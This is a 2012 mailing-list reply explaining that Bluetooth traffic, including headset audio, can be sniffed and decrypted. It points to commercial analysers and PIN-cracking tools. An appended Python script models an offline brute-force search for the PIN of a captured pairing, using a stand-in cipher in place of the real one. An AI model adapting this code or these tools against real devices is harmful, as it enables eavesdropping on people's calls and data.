[liberationtech] How secure is Bluetooth?

Jacob Appelbaum jacob at appelbaum.net
Sun Jan 29 22:23:07 PST 2012


On 01/29/2012 04:09 PM, Brian Conley wrote:
> See my first email please.
> 
> Are there any documented cases of monitoring the audio transmitted between
> a Bluetooth headset and phone?

I guess you're looking for some personal stories or big news stories?

> 
> I am quite aware that Bluetooth is not safe for a variety of reasons.
> 

Please note that your users will likely be targeted by cops with FinFisher:
http://speciali.espresso.repubblica.it/pdf/spyfiles/it-intrusion.pdf

> When preparing advice for non technical people with very real security
> problems that are known, it's important to provide the best advice about
> what is not known in their situation. I've been unable to find any
> information on the viability of intercepting audio transmissions, even the
> 2007 article doesn't appear to suggest for certain that they could
> reconstruct the audio file, merely that the potential might be there.
> 

Audio is a weird way to frame it. Devices that communicate with
Bluetooth (TM) use common cryptography and protocols. The crypto is
busted: http://en.wikipedia.org/wiki/E0_(cipher)

This is a pretty funny read:
http://en.wikipedia.org/wiki/Bluetooth#Security

Overall, I think it's important to note that even if a device wasn't
used in a discoverable mode, a sniffer can at least passively track and
try to exploit devices nearby after seeing them transmit. This is likely
similar to Bluejacking:
http://en.wikipedia.org/wiki/Bluejacking

Here's a project that uses a car as an audio bug:
http://trifinite.org/trifinite_stuff_carwhisperer.html

> I'm only asking if anyone has heard of documented cases of listening in to
> Bluetooth audio. So far it only seems to happen if there is a prior exploit
> in place and that doesn't even appear to be definitive.

R&S sells a solution to sniff traffic between two devices:
http://www2.rohde-schwarz.com/file_13603/Bluetooth_Sniffer_v2.4.pdf

"In an active Piconet, where at least two Bluetooth® devices
(one master, one or more slaves) interact with each other, the
USB dongle is air sniffing the communication between those. This
analysis is required to check interoperability of Bluetooth®
devices from different vendors and to troubleshoot problems by
detailed protocol decoding"

Those guys also sell IMSI-catchers if you're in the market...

This "Decrypting Encrypted Bluetooth data with FTS4BT" is also a good read:
http://www.fte.com/docs/encryption%20and%20decryption%20in%20fts4bt.pdf

Basically, the FTS4BT just needs the pin to decrypt the data and that's
where h1kari's work comes in:
http://openciphers.sourceforge.net/oc/
http://openciphers.sourceforge.net/oc/btpincrack.php

Bluetooth Pin Cracking Core says:

"The bluetooth pin cracking core implements the basic bluetooth pin
cracking attack by generating possible PINs and running them through
SAFER+ to verify if they are correct or not. This uses the pipelined
implementation of SAFER+ and loops the output of the pipeline back into
itself 7 times to perform all of the E21/E22/E1 functions. The max
clock speed we've been able to run it at on an E-12 is 75MHz which
results in ~10 million PINs per second compared to roughly 40k on a
modern CPU."

The openciphers project supports the protocol analyser files produced by
these devices:
http://www.lecroy.com/protocolanalyzer/?capid=103&mid=511

This does HCI and air interface sniffing in sync:
http://www.connectblue.com/products/sniffer-protocol-analyzers/bluetooth-sniffer-protocol-analyzer/

Note the features of that one:
"Extracts Audio into WAV files: Supports A2DP, HSP & HF Profiles with
playback for rapid quality check or performing a more detailed analysis"

And if all of that doesn't convince you that someone can sniff Bluetooth
- I encourage you to read this student's web page:
http://nap.cse.bgu.ac.il/home/index.php/Bluetooth_Sniffing

This seems to be the best buy for your money:
http://compare.ebay.com/like/150735473216?var=lv&ltyp=AllFixedPriceItemTypes&var=sbar

$799.99 for the LeCroy Merlin CATC Mobile Bluetooth Protocol Analyzer
seems like a deal. Even cheaper than the USRP!

If you're looking for other devices for BT sniffing, I also found this:
http://www.palowireless.com/bluearticles/bluetoothanalyzercompare1.asp

And finally - the Ellisys equipment:
http://www.ellisys.com/products/bex400/revolution.php
"The new Ellisys All-Channel sniffer robustly records any packet, at any
time, from any neighboring piconet, with zero-configuration and without
being intrusive."

http://www.ellisys.com/products/bex400/ has the best quote:
"Determine PIN codes automatically and decrypt the data on the fly"

Two nice photos of the device and software:
http://www.ellisys.com/archive/images/bex400.png
http://www.ellisys.com/archive/images/bex400_soft.png

All the best,
Jacob
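The PIN-cracking step referenced above (FTS4BT needs the PIN; btpincrack and the openciphers FPGA core recover it from a sniffed pairing) can be shown in code. The following is an added example for this thread, not code from the post, from openciphers or from any vendor tool. It reproduces the structure of the offline attack against Bluetooth 2.0 legacy pairing: which values a sniffer sees on the air (BD_ADDRs, IN_RAND, the Kinit-masked LK_RANDs, the AU_RAND/SRES authentication pairs) and how each candidate PIN is checked by rerunning the key derivation. One assumption is made for self-containment: the real E22/E21/E1 functions are built on SAFER+, and here they are replaced by an HMAC-SHA256 stand-in of the same input/output shape; the addresses and random values are constructed for the demo.

```python
# Offline PIN search against a sniffed Bluetooth 2.0 legacy pairing: the
# structure of the attack that btpincrack / the openciphers core run at
# ~10M PINs/s. Added example; not code from the post or from openciphers.
#
# ASSUMPTION: the real E22/E21/E1 are SAFER+ (Ar') based. They are replaced
# here by an HMAC-SHA256 stand-in with the same inputs and output sizes so the
# script runs stand-alone. What is on the air and what is guessed follows the
# legacy pairing flow; only the primitive differs.
import hashlib
import hmac
import itertools


def _prf(key: bytes, *parts: bytes) -> bytes:
    """16-byte keyed stand-in for SAFER+ (assumption, see header)."""
    return hmac.new(key, b"".join(parts), hashlib.sha256).digest()[:16]


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def e22(pin: str, bd_addr: bytes, in_rand: bytes) -> bytes:
    """Kinit from the PIN, the claimant's BD_ADDR and the public IN_RAND."""
    return _prf(pin.encode(), bd_addr, in_rand)


def e21(lk_rand: bytes, bd_addr: bytes) -> bytes:
    """One device's contribution to the combination (link) key."""
    return _prf(lk_rand, bd_addr)


def e1(link_key: bytes, claimant_addr: bytes, au_rand: bytes) -> bytes:
    """Authentication response SRES (4 bytes) to a challenge AU_RAND."""
    return _prf(link_key, claimant_addr, au_rand)[:4]


def pair(pin, addr_a, addr_b, in_rand, lk_rand_a, lk_rand_b, au_rand_a, au_rand_b):
    """The two legitimate devices. Returns the link key and everything that
    crossed the air, i.e. what a protocol analyser in the thread would capture."""
    kinit = e22(pin, addr_b, in_rand)
    # LK_RAND values are sent masked with Kinit, never in the clear
    masked_a = xor(lk_rand_a, kinit)
    masked_b = xor(lk_rand_b, kinit)
    link_key = xor(e21(lk_rand_a, addr_a), e21(lk_rand_b, addr_b))
    # Mutual authentication: A challenges B, then B challenges A
    sres_b = e1(link_key, addr_b, au_rand_a)
    sres_a = e1(link_key, addr_a, au_rand_b)
    transcript = {
        "addr_a": addr_a, "addr_b": addr_b, "in_rand": in_rand,
        "masked_a": masked_a, "masked_b": masked_b,
        "au_rand_a": au_rand_a, "sres_b": sres_b,
        "au_rand_b": au_rand_b, "sres_a": sres_a,
    }
    return link_key, transcript


def crack_pin(t, max_digits=4):
    """Attacker holding only the transcript: try numeric PINs shortest first,
    rerun the whole derivation per candidate, accept when both SRES match.
    Returns (pin, link_key) or (None, None)."""
    for n in range(1, max_digits + 1):
        for digits in itertools.product("0123456789", repeat=n):
            pin = "".join(digits)
            kinit = e22(pin, t["addr_b"], t["in_rand"])
            lk_rand_a = xor(t["masked_a"], kinit)   # unmask the sniffed values
            lk_rand_b = xor(t["masked_b"], kinit)
            link_key = xor(e21(lk_rand_a, t["addr_a"]), e21(lk_rand_b, t["addr_b"]))
            if (e1(link_key, t["addr_b"], t["au_rand_a"]) == t["sres_b"]
                    and e1(link_key, t["addr_a"], t["au_rand_b"]) == t["sres_a"]):
                return pin, link_key
    return None, None


def worst_case_seconds(pin_digits: int, pins_per_second: float) -> float:
    """Exhaustive search time for an all-numeric PIN of the given length."""
    return 10 ** pin_digits / pins_per_second


def sample_transcript():
    """Constructed pairing (addresses and 'randoms' made up for the demo)."""
    addr_a = bytes.fromhex("001122334455")
    addr_b = bytes.fromhex("66778899aabb")
    rnd = lambda s: hashlib.sha256(s).digest()[:16]
    return pair("7391", addr_a, addr_b, rnd(b"in"), rnd(b"lk_a"),
                rnd(b"lk_b"), rnd(b"au_a"), rnd(b"au_b"))


if __name__ == "__main__":
    real_key, transcript = sample_transcript()
    pin, key = crack_pin(transcript)
    print("recovered PIN:", pin, "link key matches:", key == real_key)
    print("4-digit PIN worst case: CPU at 40k/s %.2fs, FPGA at 10M/s %.4fs"
          % (worst_case_seconds(4, 40_000), worst_case_seconds(4, 10_000_000)))
```

Two things the code makes concrete: the attacker never has to be online or interact with either device, since every input to the derivation except the PIN is in the capture, and the recovered link key is what a decrypting analyser then uses for the rest of the session. Search cost grows as 10^n in the PIN length, which is why the quoted 40k vs 10M PINs/s figures only matter for PINs much longer than the four digits most headsets use.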
